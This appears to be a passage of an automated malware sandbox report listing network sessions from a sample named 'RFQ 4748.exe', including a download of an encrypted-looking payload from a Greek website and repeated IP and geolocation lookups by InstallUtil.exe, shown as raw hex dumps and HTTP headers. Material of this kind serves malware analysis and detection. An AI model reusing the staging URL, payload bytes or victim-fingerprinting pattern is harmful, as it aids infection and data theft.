                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.549831193.122.6.168803652C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 8, 2024 11:51:47.840441942 CET151OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 8, 2024 11:51:49.617852926 CET323INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:49 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: a6bfa82d29ce5cd1fd55764e78a03773
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.549704185.78.221.734435272C:\Users\user\Desktop\RFQ 4748.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:11 UTC86OUTGET /slim/Knlpdavcfrw.vdf HTTP/1.1
                                                            Host: www.oleonidas.gr
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:11 UTC273INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:11 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 08 Nov 2024 05:15:34 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 952328
                                                            Cache-Control: max-age=1209600
                                                            Expires: Fri, 22 Nov 2024 10:51:11 GMT
                                                            Vary: User-Agent
                                                            Connection: close
                                                            2024-11-08 10:51:11 UTC7919INData Raw: 86 32 08 29 57 55 bc 15 84 b2 50 0b e0 b0 b1 85 a8 db 53 fc 8b d0 a6 33 f8 28 3c 0f c7 85 dc 0b f0 50 13 0b 80 7d 16 06 57 d3 13 f8 10 78 85 1f 7b a0 32 21 4f d0 ff 23 ea 4d f0 4d 2a e3 4c 92 c4 4c e9 3a 9e cc 9d 6d c2 d7 bb 93 d5 1e ea aa 2f e9 6f ef 04 0b 08 6e c4 2f 84 d0 44 cb 3e cc 14 1b f4 b2 7c 04 27 39 4f 17 92 11 65 9b c9 ed 49 81 2a da 6f 35 50 5c 80 84 75 6f b1 00 5d 78 ab bc d0 a0 b4 c9 3f 60 e0 58 3e 59 f0 b1 ec 9d 91 65 1c 13 0b 11 e3 39 cf 5a f2 75 0a eb 20 b0 69 68 cb 14 c6 d2 cb 5d 4c 66 49 c2 7c 44 9f 8d 98 db 4f 77 94 61 87 05 33 c8 71 41 ea c6 65 48 73 6d ed 90 ae 96 77 c0 59 0f fb e6 05 8e 6f 28 22 6d dd c7 82 02 31 b1 12 c2 6c 7e a5 45 b9 5b 4c 0e 2e d4 02 73 1e 81 f5 00 de 18 78 fd 58 4c a8 9f 7a 07 a8 d7 3c 06 51 19 86 c0 7b b6 f4
                                                            Data Ascii: 2)WUPS3(<P}Wx{2!O#MM*LL:m/on/D>|'9OeI*o5P\uo]x?`X>Ye9Zu ih]LfI|DOwa3qAeHsmwYo("m1l~E[L.sxXLz<Q{
                                                            2024-11-08 10:51:12 UTC8000INData Raw: c8 fb 4b 34 f7 cd 72 37 9a 7c 88 62 46 bc dc c0 8c ab 3c 28 d8 fe 22 03 38 85 31 d9 97 3a f0 5f 7d 75 f4 98 fc 04 2e d0 fc e5 06 48 7a d6 0d 92 89 50 f1 06 86 c3 46 ae 8a 31 a9 a3 2e 45 0a 91 8f c1 a2 92 83 42 9f 9e 42 fd d9 e7 61 f6 90 78 6e 3f ab 8c 5c 2a 33 4c 29 6a 84 ed c1 71 40 4b 59 f7 d3 e1 51 70 28 2b 2c 82 74 5d b0 52 f2 08 7d b3 30 f3 c9 24 3f 87 68 e7 b2 c6 1a b6 db 50 31 d3 c7 fe 40 c1 27 80 01 ec ad 5a ed 06 86 61 e9 72 8c f3 61 15 77 8d c9 65 e7 b8 24 96 f2 0d da 1c cf 53 bc 50 93 6c ab af cf 2d 88 45 65 81 ac ff 19 ff 86 09 bd 71 ba d9 56 76 44 c2 cd 8f 3c 1d 85 3e 03 c7 99 40 e2 f4 33 95 78 b3 6c 01 d7 03 14 f1 91 cd 49 1f 08 b5 bd 72 64 04 f3 89 4e c7 a8 64 87 84 75 1a 46 37 36 6a 83 5f 73 64 58 57 f4 35 cd c0 ab 64 7e 65 23 9b 6d 43 cb
                                                            Data Ascii: K4r7|bF<("81:_}u.HzPF1.EBBaxn?\*3L)jq@KYQp(+,t]R}0$?hP1@'Zarawe$SPl-EeqVvD<>@3xlIrdNduF76j_sdXW5d~e#mC
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 99 c2 0f 9f fd 00 b3 6d 94 87 e9 83 48 61 f4 91 fd e2 d2 39 3b 11 ee 98 73 31 5e 71 a0 5a 42 22 3d a3 e0 87 a8 8e 9e af 49 fa af ee ff 4b 21 a8 6e 12 47 37 8a 9d 62 37 64 c6 a4 4e 3c 99 62 5b 46 00 17 00 c2 11 06 00 17 62 dd 0f 81 1d d8 04 de 6d eb 48 bf 21 58 0b 4f 41 75 a2 20 52 c2 16 60 ea 6b fe 5a 5a 81 9c d6 15 2b 4e 76 a6 e3 17 08 25 44 25 ec 31 09 ab f7 74 7c a8 dc 14 02 6b 42 53 89 2e 68 c3 2b 49 c5 4c 24 e0 ad 9a fc b7 ff 53 40 a6 c3 35 c0 19 a6 b1 61 27 6e 88 c1 ac c2 ed 86 4f 7c 6f 1e c3 33 a9 e0 79 99 5d 65 b5 eb c9 ac 33 2f ae d9 57 18 b7 0b 35 37 fc 71 32 78 8c da 65 35 c7 62 ed 96 4e 47 50 25 1d ae 53 af e5 d8 29 2e 20 fd 80 eb a8 cc 97 91 27 24 5d 7c c6 57 42 4f 8d 4d b0 6e 8c 7d 2b cb 67 cf 14 d4 bd 2d ad 8b b8 13 da 4b d7 1d b9 0d f1 e0
                                                            Data Ascii: mHa9;s1^qZB"=IK!nG7b7dN<b[FbmH!XOAu R`kZZ+Nv%D%1t|kBS.h+IL$S@5a'nO|o3y]e3/W57q2xe5bNGP%S). '$]|WBOMn}+g-K
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 66 75 7d 97 35 ea 54 6b 3c 0e e3 05 65 58 ac c6 5a 1e 4c 21 ee 0c 7e 04 6f b6 e2 f4 69 24 a9 ca fe 02 8a 0b 83 db 56 e8 d4 e1 b2 76 93 be 66 1a 57 5e 31 90 21 6f 6b 37 6f ae 3b 90 f9 5e 2c bc 1a 58 17 0e 8d 34 45 ef 1c c4 b2 fb b0 91 1c 5d 58 b3 56 b7 9f 1f 12 89 96 3e a5 10 4b 50 84 0e 65 1e b4 69 98 1a 5f 61 3b 0e e8 8c 8b 60 9e e0 2e a5 83 be f5 49 0a 8e 3a 9e 2f f6 f7 13 84 ae c3 4f 6f 16 e2 c2 0d 93 1b 11 97 e3 9b 47 01 ca 3d 1b 82 0d 04 c7 2f 94 39 99 94 d8 8c cf b5 12 d5 b5 2f 8d b2 a3 7e 50 22 18 dc f4 e2 f7 9a 7e 80 59 a4 21 87 99 21 65 a3 ef 9e a2 ee b7 32 e3 ba 1c 3a df 92 ad 7f 80 0a 4d c6 88 3b 7f 89 09 19 d6 a5 e0 87 04 a7 e4 de 74 3a 35 51 a6 fd 14 98 dd e4 4c 20 b1 2a 1b 50 2b b4 0f eb 4f 0b 8c 58 04 09 13 3d 6f 2c b5 03 db 67 fc 22 0b eb
                                                            Data Ascii: fu}5Tk<eXZL!~oi$VvfW^1!ok7o;^,X4E]XV>KPei_a;`.I:/OoG=/9/~P"~Y!!e2:M;t:5QL *P+OX=o,g"
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 80 3e c9 92 e6 55 7e ca 7e 5c 06 5b 3c ca 0a 7c 05 e1 eb 19 be d5 2b 1d db 1d 23 10 ee b6 1e d6 5b 9d 24 f8 a7 01 06 9b 90 86 6e 61 4e eb 2e ae 81 a9 2f a5 ac 75 f3 da 28 f7 d2 86 97 79 c9 a4 5d 60 36 0f 79 29 42 4e 2d aa c9 71 79 24 cb 74 18 dd ed 01 9a ea 15 ef ea 7a dd 2e a3 b2 8e 1f c1 56 fa 2b 59 dd 2f ba 3d 2d 1e 29 68 64 4d 6f 2a 4f b4 60 cd 00 da 2d 2b bb 04 42 e3 46 4a 71 8b 76 90 6f e7 80 22 2d 5a fc e7 eb a9 a6 6d 53 43 97 4e f0 bc f4 f0 33 cc c6 34 76 bd 87 10 37 6d 2a 61 19 87 ee 0c 12 38 4e e9 1b 0f a9 7e 56 e8 2d 84 5e 36 b8 30 03 78 ac 3c 56 16 c3 63 59 6c 61 a2 df 3a 55 5e 90 f4 45 97 f0 54 60 6e 08 7a 30 41 07 e6 42 61 8e 03 5b 5a 83 b1 da 01 b8 d6 5f 63 62 dc 60 16 3a cf 88 47 54 b5 5e 89 09 ba 46 4f ed ad f4 76 e6 b9 71 b1 b0 83 c7 99
                                                            Data Ascii: >U~~\[<|+#[$naN./u(y]`6y)BN-qy$tz.V+Y/=-)hdMo*O`-+BFJqvo"-ZmSCN34v7m*a8N~V-^60x<VcYla:U^ET`nz0ABa[Z_cb`:GT^FOvq
                                                            2024-11-08 10:51:12 UTC8000INData Raw: fe ee 88 78 96 97 f8 60 a4 d8 2c 94 25 2a 2b ce ea 2e 8b 05 5e cc fd aa 4d 1c 72 e5 1b 93 1a 02 8b aa f5 40 65 ff 93 e4 26 b3 96 79 54 f2 42 0c 53 89 d2 79 47 0c f7 8b e8 12 69 de 12 3b 52 af 24 f2 eb f7 96 5d 97 c0 f3 30 f2 1c a8 74 03 f7 32 4c 45 c8 d1 e6 cf 81 6e 4f fb c9 6f 89 e8 92 9d ef fc a4 8e b6 5c 12 9b 78 f6 8c f9 67 f0 f0 1f 8f ec 4f 63 a5 25 43 e6 2d 74 13 41 de f7 6a 24 35 7b b1 34 e7 9c 2c a4 fb 08 30 2c a8 8f b4 ef 98 da 9d 61 6d 4d bd 80 d4 fe 8a 34 df df 30 34 ba f9 05 be d3 15 73 3c 2a 4b eb 8c 0e 16 58 f9 02 d9 cb fe 61 4a d1 e8 20 cf 2d db 4a 7e 64 cc 3e 22 b4 ef 5a 28 d1 ed 92 54 17 04 14 58 2b 60 89 d9 53 69 80 e2 6c 44 ed 68 31 8e 96 a8 f1 15 5e ad ce dd 4b 26 fd 2a 76 b4 49 44 f3 33 e4 91 0f f4 22 64 ca ce dd 9a e9 23 c8 36 0a da
                                                            Data Ascii: x`,%*+.^Mr@e&yTBSyGi;R$]0t2LEnOo\xgOc%C-tAj$5{4,0,amM404s<*KXaJ -J~d>"Z(TX+`SilDh1^K&*vID3"d#6
                                                            2024-11-08 10:51:12 UTC8000INData Raw: de 01 e5 7d 35 03 5e c5 1a c7 32 bf bc 8b 16 94 f6 bc 8e 15 df b8 17 88 95 32 b7 8e ea e9 0d 06 05 63 9a fc 69 74 e0 85 c7 58 c6 6d de 7d a7 2e 63 40 db f2 62 cf c4 b7 15 33 2e db 78 b6 3d 10 96 7a 51 77 dd d9 b2 1d 1e 87 83 04 e7 f8 18 56 db 14 9d 08 83 1f 3f f0 eb ea d9 9d b5 ff ea 07 28 66 bc 6b 67 1e 71 c8 92 78 3b db 8f fd f2 6b 53 0c b6 35 1c 83 34 e9 c1 27 34 0e 6b 4c 99 71 ee 7b 7e 1d 88 23 9a ad d5 71 2a 6a bb bf 05 3d 8c 10 37 9b ad e4 5e 2e b7 4b f5 51 48 95 46 1c ea b7 d6 9f 54 81 91 ef c1 6e 2b 33 84 1f 74 ae 9b 68 96 47 ce a1 e7 78 e9 a7 c6 95 c3 f8 19 30 25 da ab 2d a8 48 e5 90 d7 69 4d a9 79 b0 bd d6 30 33 71 53 20 8d dd 6e c2 b3 fa 0d 1f 5a 46 db 16 62 71 54 eb 8c 20 be 83 3e 2c 93 b6 17 77 9c 8a 94 62 f8 11 2a 54 b1 6d ef 31 8b c4 b8 48
                                                            Data Ascii: }5^22citXm}.c@b3.x=zQwV?(fkgqx;kS54'4kLq{~#q*j=7^.KQHFTn+3thGx0%-HiMy03qS nZFbqT >,wb*Tm1H
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 6c 58 31 d2 cd e4 69 99 40 8e 90 eb 26 7d 32 83 5f a7 4f f4 d2 67 54 f9 4a 9d 85 08 d4 65 54 b3 d5 ea 9e 11 db 18 4f 66 df 4c f8 8f 4f 2d 5d 14 3b 8d c7 7c e8 36 00 3d 5f 11 09 73 81 6f 86 53 fa 94 a1 26 bc 36 4c 7b 99 18 c0 c3 75 55 26 2f 9f 58 4e 49 83 7e e5 6f f3 42 8b bd a7 b3 aa 0d bf 66 f3 38 fb 47 17 09 0f ae 39 93 66 c5 b6 52 2b f3 ff ea cb ae d0 dd cb 5d a1 92 89 58 cf fa 30 53 3a e9 3d 2f 65 ca 5f 4b 2e 96 00 45 1d ef 0e 85 f8 39 6f 44 4a e5 12 6f 12 14 4c a0 e5 56 8f 71 c6 78 1e 41 b1 68 58 7c 1d 62 e0 ad 25 05 e5 74 ca 13 bc 8e b3 0d bd 90 ec 5a 9b 4a 6a 23 f4 ab 36 ea 9d f2 b2 bb 8a 5f a0 c5 00 ca 39 b1 13 6a 30 f8 5b 07 b4 8c 78 ec d7 1e cc 5e e9 a4 fd 4b ed 18 ce 58 25 a3 3d 70 b5 36 e8 c9 35 84 10 32 b0 d7 c4 71 a6 a7 2f 9d 5b ad 78 bb 56
                                                            Data Ascii: lX1i@&}2_OgTJeTOfLO-];|6=_soS&6L{uU&/XNI~oBf8G9fR+]X0S:=/e_K.E9oDJoLVqxAhX|b%tZJj#6_9j0[x^KX%=p652q/[xV
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 65 9c c0 b7 50 fd 21 57 44 63 cc 41 fb 7a 75 a7 25 5f 9d 89 78 42 67 6e be 35 29 84 7a 4c 96 c8 b3 e3 d0 ae e4 d0 f9 9d f6 56 0e d4 51 98 dc 50 12 2b fa 0b 39 b0 4e 4c b3 75 8f 41 68 b1 42 28 a6 f0 bd a2 24 56 1e c5 f8 c1 72 eb cc e6 9e 9b 3a a4 82 41 ad 4b 3a a1 dd 8e 0a 19 08 b5 97 d3 60 28 a4 6a a8 6b b6 6a 42 8d 42 59 8e 65 59 fc 2f 08 b1 c0 80 32 99 5c 12 a9 d3 73 84 89 7c bb 03 69 25 85 e1 53 0f 55 f7 12 32 19 92 75 35 8c 5d c5 7c cb aa dd 96 6a f2 1a 4d f3 16 ed ab 89 9a d0 e8 ad 23 4d 1c a2 7b e1 ca 15 c7 81 3c f4 55 26 32 8c b5 57 47 5b e4 f7 40 5c 0d 81 ea 23 1c d4 6e 30 18 39 cd e0 e0 0e 32 be 63 86 01 95 59 c4 f4 ba ee 2f d3 10 c2 c1 a7 c3 7a f7 9d df 66 2a e8 c7 86 e4 69 e9 6e 66 86 1c 1a 77 e6 a5 61 05 dc d8 95 33 1b b3 7d c4 4d 26 e0 e9 55
                                                            Data Ascii: eP!WDcAzu%_xBgn5)zLVQP+9NLuAhB($Vr:AK:`(jkjBBYeY/2\s|i%SU2u5]|jM#M{<U&2WG[@\#n092cY/zf*infwa3}M&U
                                                            2024-11-08 10:51:12 UTC8000INData Raw: 4a 1f 6f 9c 6c d4 37 c8 56 6b a1 81 a1 82 ef 37 9f ed 5b 67 01 9a 5f 71 01 ae c0 1d 30 2f 55 bd 7f 4a 45 8e f0 43 0e e1 5e d1 6d 6f c1 14 d2 57 db e0 15 fc 52 00 98 78 05 bb 7d d4 d9 e3 6e 79 2a f1 f1 04 5a fa 91 ca dc 7c ff 49 b8 22 43 02 b9 16 26 5d 29 a4 aa c9 8f 31 f2 ce bc aa 4b 8a d3 37 34 60 39 0f f7 de 02 93 b7 71 a2 33 6e 72 5e b4 57 57 2e b3 c0 81 70 e3 86 39 dc fa 05 da 54 33 c2 93 35 eb 8c 0a 73 51 ba d3 75 49 7c c7 11 4a 83 c7 b6 67 79 1e 31 ea 73 0e 12 97 4e 98 83 14 be d7 ab 9b bb 06 86 e2 92 44 f5 c3 fd a3 4a f9 dd a6 90 21 81 b4 66 78 39 24 db a4 ac f7 1a 47 ad d2 b2 d9 53 45 b3 b6 a0 6e 3c ef f1 db a0 26 81 a0 f6 fe 30 c2 44 11 55 d2 ec bc 50 6d d2 8b 97 da 81 f1 5a d1 b3 9d d4 f8 1a ac 82 fc 50 35 ef c1 ba 75 71 04 76 93 86 5d 9a 81 1a
                                                            Data Ascii: Jol7Vk7[g_q0/UJEC^moWRx}ny*Z|I"C&])1K74`9q3nr^WW.p9T35sQuI|Jgy1sNDJ!fx9$GSEn<&0DUPmZP5uqv]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549706188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:18 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:19 UTC1219INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:18 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15793
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QHJMbN8RLQ6d0jF6nem%2BEFFoZVi9jVIrb975CYYXylLxyegHQrvFEDxfg6mjm7pgTBPVFGa74vnjWyno2Ig15w94rHO63p%2FFTXMTY7Q8mVYsAKPLC2O581EV0MNMu1Hv%2BlPaNi%2Ff"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501d2be9847a9-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1907&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1664367&cwnd=251&unsent_bytes=0&cid=3d8953d271fc4247&ts=204&x=0"
                                                            2024-11-08 10:51:19 UTC150INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName
                                                            2024-11-08 10:51:19 UTC209INData Raw: 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: >Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.549707188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:19 UTC63OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-11-08 10:51:20 UTC1211INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:20 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15795
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9QOPubbZ93c7Ev5VQfMmhfYMnwlPMWGYyo3gzjqY0Kk73QIsJKr0Tb7mYdaWu5Q7vrH6xeHerv72m7X8Wz65sU4Eq87LookR9OXYp6jgeJGm2xK1PBM9fGpcjPriYOMugGTKHOV"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501da6d336b0b-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1043&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2613718&cwnd=251&unsent_bytes=0&cid=cbf04018bd2a01f9&ts=153&x=0"
                                                            2024-11-08 10:51:20 UTC158INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f
                                                            Data Ascii: <Response><IP>173.254.250.90</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</
                                                            2024-11-08 10:51:20 UTC201INData Raw: 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                            Data Ascii: RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.549709188.114.96.3443360C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-11-08 10:51:21 UTC87OUTGET /xml/173.254.250.90 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-08 10:51:22 UTC1221INHTTP/1.1 200 OK
                                                            Date: Fri, 08 Nov 2024 10:51:21 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 359
                                                            Connection: close
                                                            x-amzn-requestid: 6faed900-016e-4e5e-a211-e485a8342369
                                                            x-amzn-trace-id: Root=1-672daf75-5cf9589710b7718d28419240;Parent=29665f1bc67c9060;Sampled=0;Lineage=1:fc9e8231:0
                                                            x-cache: Miss from cloudfront
                                                            via: 1.1 1fe1fb13f3fdb246ffe26042a7d8f9b0.cloudfront.net (CloudFront)
                                                            x-amz-cf-pop: DFW57-P5
                                                            x-amz-cf-id: G4WREKFxOYROHi3MeKGuUlXivgL0Kb3Ff_tGLlXaadTYoynIqx5Zxg==
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 15796
                                                            Last-Modified: Fri, 08 Nov 2024 06:28:05 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FmEO6qQ%2FWF%2BU7DNm%2F2fF6fcjkbd5S9c24eDbklE4l%2BfiEVWKfcZXnhALU9vbCJ48CCU2P4Zv609XdnyZ1FN36uZkHaLJF6MXVLy301zU0hQrfdrNvswIZMtyq0lDxHkiSrW2zSlv"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8df501e64c1b6b06-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1973&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1527426&cwnd=236&unsent_bytes=0&cid=f400ea4ea23f27ba&ts=147&x=0"
                                                            2024-11-08 10:51:22 UTC148INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61
